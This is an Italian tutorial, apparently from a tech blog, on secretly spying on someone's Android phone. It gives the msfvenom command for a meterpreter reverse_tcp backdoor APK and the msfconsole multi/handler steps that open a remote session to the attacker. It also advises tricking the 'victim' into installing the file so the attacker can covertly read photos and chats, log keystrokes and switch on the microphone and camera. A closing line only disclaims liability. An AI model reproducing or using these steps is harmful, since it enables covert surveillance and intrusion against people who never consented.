Come spiare un telefono con una backdoor
Da tempo volete venire a conoscenza delle azioni che una persona compie sul proprio cellulare e non resistite più alla tentazione; allora vi spiegherò semplici passaggi mediante i quali potete creare una backdoor, ovvero una porta di accesso segreta, all’interno del dispositivo della vittima, che vi permetterà di svolgere una miriade di azioni, per esempio accedere alle foto, alle conversazioni, attivare il microfono, keylogger e addirittura la fotocamera; il tutto ovviamente sarà invisibile alla persona. Innanzitutto dovrete essere equipaggiati con Kali Linux, piattaforma specializzata negli attacchi di penetration-testing; prima di iniziare, un requisito fondamentale è che il telefono della vittima abbia come sistema operativo Android. A questo punto possiamo iniziare! Per prima cosa aprite un terminale e digitate il seguente comando:
msfvenom -p android/meterpreter/reverse_tcp LHOST=”vostro IP locale” LPORT=”vostra porta locale” R > “nome della backdoor”.apk
Per venire a conoscenza del vostro IP dovrete semplicemente aprire un altro terminale (senza chiudere quello precedente) e digitare “ifconfig”; come porta potete utilizzare una qualsiasi, io vi consiglio la 443, quella di default.
A questo punto mettiamo a nostra disposizione la backdoor che abbiamo creato con il primo comando all’inizio della spiegazione; solitamente la backdoor dovrebbe andarsi a posizionare nella cartella home, noi per comodità la sposteremo sul Desktop (Scrivania).
Benissimo, adesso apriamo metasploit digitando sul terminale il comando “msfconsole”
Una volta giunti qui, cominciamo a digitare una serie di comandi:
-use multi/handler
-set PAYLOAD android/meterpreter/reverse_tcp
-set LHOST “nostro indirizzo IP locale” (dobbiamo inserire lo stesso IP inserito all’inizio)
-set LPORT “nostra porta locale” (anche in questo caso dobbiamo inserire la stessa porta che abbiamo inserito all’inizio)
-show options
-exploit
A questo punto mantenete aperto il terminale in ascolto e installate la backdoor sul dispositivo della vittima; ai tempi di oggi è molto semplice ingannare una persona e di sicuro, con una scusa e con tanta intelligenza, troverete il modo per ottenere ciò che volete.
Installata la backdoor, il terminale la riconoscerà e si aprirà una sessione tra il computer attaccante e il telefono vittima; giunti qui, ci sono tantissimi comandi che possono essere svolti sull’Android che state attaccando, potete conoscerli mediante il comando “help”.
Ricordiamo che entrare a conoscenza di info riservate, senza permesso di accedervi, è violazione della privacy. L’eventuale uso scorretto che farete di queste informazioni sono punibili legalmente e tutto lo staff di Tecnogalaxy.it si esonera da qualsiasi risponsabilità.
